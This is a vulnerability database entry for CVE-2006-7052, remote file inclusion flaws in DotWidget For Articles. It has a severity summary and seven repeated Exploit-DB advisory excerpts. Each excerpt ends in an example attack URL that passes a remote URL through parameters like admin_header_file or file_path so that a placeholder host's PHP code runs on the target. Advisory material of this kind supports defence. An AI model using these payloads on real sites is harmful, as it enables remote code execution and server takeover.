CVE-2006-7052
published 2007-02-24CVE-2006-7052: Multiple PHP remote file inclusion vulnerabilities in DotWidget For Articles (dotwidgeta) 0.2 allow remote attackers to execute arbitrary code via a URL in the…
PriorityP345critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
6.36%
92.8th percentile
Multiple PHP remote file inclusion vulnerabilities in DotWidget For Articles (dotwidgeta) 0.2 allow remote attackers to execute arbitrary code via a URL in the (1) file_path parameter to (a) index.php, (b) showcatpicks.php, and (c) showarticle.php; and the (2) admin_header_file and (3) admin_footer_file parameters to (d) admin/authors.php, (e) admin/index.php, (f) admin/categories.php, (g) admin/editconfig.php, and (h) admin/articles.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| keith_reichley | dotwidget_for_articles | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
dotWidget for articles 2.0 - '/admin/authors.php' Multiple Remote File Inclusions
exploitdb·2006-06-03
CVE-2006-7052 dotWidget for articles 2.0 - '/admin/authors.php' Multiple Remote File Inclusions
dotWidget for articles 2.0 - '/admin/authors.php' Multiple Remote File Inclusions
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issue may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/admin/authors.php?admin_header_file=http://www.
Exploit-DB
dotWidget for articles 2.0 - '/admin/categories.php' Multiple Remote File Inclusions
exploitdb·2006-06-03
CVE-2006-7052 dotWidget for articles 2.0 - '/admin/categories.php' Multiple Remote File Inclusions
dotWidget for articles 2.0 - '/admin/categories.php' Multiple Remote File Inclusions
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issue may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/admin/categories.php?admin_header_file=http:
Exploit-DB
dotWidget for articles 2.0 - '/admin/editconfig.php' Multiple Remote File Inclusions
exploitdb·2006-06-03
CVE-2006-7052 dotWidget for articles 2.0 - '/admin/editconfig.php' Multiple Remote File Inclusions
dotWidget for articles 2.0 - '/admin/editconfig.php' Multiple Remote File Inclusions
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issue may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/admin/editconfig.php?admin_header_file=http:
Exploit-DB
dotWidget for articles 2.0 - '/admin/articles.php' Multiple Remote File Inclusions
exploitdb·2006-06-03
CVE-2006-7052 dotWidget for articles 2.0 - '/admin/articles.php' Multiple Remote File Inclusions
dotWidget for articles 2.0 - '/admin/articles.php' Multiple Remote File Inclusions
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issue may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/admin/articles.php?admin_footer_file=http://ww
Exploit-DB
dotWidget for articles 2.0 - '/admin/index.php' Multiple Remote File Inclusions
exploitdb·2006-06-03
CVE-2006-7052 dotWidget for articles 2.0 - '/admin/index.php' Multiple Remote File Inclusions
dotWidget for articles 2.0 - '/admin/index.php' Multiple Remote File Inclusions
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issue may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/admin/index.php?admin_header_file=http://www.exam
Exploit-DB
dotWidget for articles 2.0 - 'showcatpicks.php?file_path' Remote File Inclusion
exploitdb·2006-06-03
CVE-2006-7052 dotWidget for articles 2.0 - 'showcatpicks.php?file_path' Remote File Inclusion
dotWidget for articles 2.0 - 'showcatpicks.php?file_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issue may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/showcatpicks.php?file_path=http://www.example2.co
Exploit-DB
dotWidget for articles 2.0 - 'showarticle.php?file_path' Remote File Inclusion
exploitdb·2006-06-03
CVE-2006-7052 dotWidget for articles 2.0 - 'showarticle.php?file_path' Remote File Inclusion
dotWidget for articles 2.0 - 'showarticle.php?file_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18479/info
dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Some of these issue may be related to those discussed in BID 18258 (DotWidget CMS Multiple Remote File Include Vulnerabilities).
http://www.example.com/path/showarticle.php?file_path=http://www.example2.com/
No writeups or analysis indexed.
http://securityreason.com/securityalert/2308http://www.securityfocus.com/archive/1/437483http://www.securityfocus.com/bid/18479https://exchange.xforce.ibmcloud.com/vulnerabilities/27327http://securityreason.com/securityalert/2308http://www.securityfocus.com/archive/1/437483http://www.securityfocus.com/bid/18479https://exchange.xforce.ibmcloud.com/vulnerabilities/27327
2007-02-24
Published